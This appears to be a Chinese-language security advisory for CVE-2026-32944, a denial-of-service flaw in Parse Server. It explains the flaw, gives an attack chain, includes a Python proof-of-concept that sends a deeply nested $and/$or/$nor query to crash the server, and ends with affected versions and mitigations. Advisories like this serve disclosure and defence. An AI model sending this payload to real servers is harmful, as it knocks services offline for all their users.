CVE-2026-32944 CVSS 7.5 高危

CVE-2026-32944 Parse Server深层嵌套查询条件拒绝服务漏洞

披露日期: 2026-03-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32944

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Parse Server

漏洞概述

CVE-2026-32944是Parse Server中的一个高危拒绝服务漏洞。Parse Server是一个开源后端框架，可部署到任何可运行Node.js的基础设施上。该漏洞允许未经身份验证的攻击者通过发送包含深层嵌套查询条件操作符的单个请求来崩溃Parse Server进程，从而终止服务器并拒绝向所有已连接客户端提供服务。该漏洞影响Parse Server 9.6.0-alpha.21之前和8.6.45之前的所有版本。攻击者无需任何认证或用户交互即可利用此漏洞，对服务可用性造成严重影响。

技术细节

漏洞根源在于Parse Server在处理查询条件操作符时缺乏对嵌套深度的限制。攻击者可以构造包含深层嵌套查询条件（如$and、$or、$nor等组合）的恶意请求，当服务器解析和处理这些嵌套查询时，会消耗大量计算资源和内存，最终导致进程崩溃。Parse Server在9.6.0-alpha.21和8.6.45版本中通过新增requestComplexity.queryDepth服务器选项来限制查询条件操作符的嵌套深度，但该选项默认禁用以避免破坏性变更。攻击者利用此漏洞可实现零成本拒绝服务攻击，无需特殊权限或复杂技术即可实施。

攻击链分析

STEP 1

步骤1

攻击者识别运行Parse Server的目标服务，确认版本低于9.6.0-alpha.21或8.6.45

STEP 2

步骤2

攻击者构造包含深层嵌套查询条件操作符的恶意HTTP请求，使用$and、$or、$nor等操作符进行100层以上嵌套

STEP 3

步骤3

攻击者以未认证身份向Parse Server的查询端点发送恶意请求，通常是/parse/classes/端点

STEP 4

步骤4

Parse Server解析器递归处理深层嵌套的查询条件，消耗大量CPU和内存资源

STEP 5

步骤5

服务器进程因资源耗尽而崩溃，导致所有已连接客户端的请求无法处理，造成拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2026-32944 PoC - Deep Nested Query DoS
# Target: Parse Server < 9.6.0-alpha.21 or < 8.6.45

TARGET_URL = "http://target-server:1337/parse"

def create_deep_nested_query(depth=100):
    """Generate deeply nested query condition operators"""
    query = {"$nor": [{"_id": "test"}]}
    current = query
    for i in range(depth):
        current["$and"] = [{"$or": [{"_id": f"test{i}"}]}]
        current = current["$and"][0]
    return query

def exploit_cve_2026_32944():
    """Exploit deep nested query to cause DoS"""
    headers = {
        "X-Parse-Application-Id": "test-app-id",
        "Content-Type": "application/json"
    }
    
    nested_query = create_deep_nested_query(depth=100)
    
    try:
        response = requests.post(
            f"{TARGET_URL}/classes/TestClass",
            headers=headers,
            json={"where": nested_query},
            timeout=30
        )
        print(f"Response Status: {response.status_code}")
        print(f"Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        print("Target may have crashed due to DoS vulnerability")

if __name__ == "__main__":
    exploit_cve_2026_32944()

影响范围

Parse Server < 9.6.0-alpha.21

Parse Server < 8.6.45

防御指南

临时缓解措施

在无法立即升级的情况下，可通过配置Web应用防火墙规则限制包含深层嵌套查询条件的请求，或在反向代理层实施请求大小和复杂度限制。建议优先安排升级到修复版本以根本解决该漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表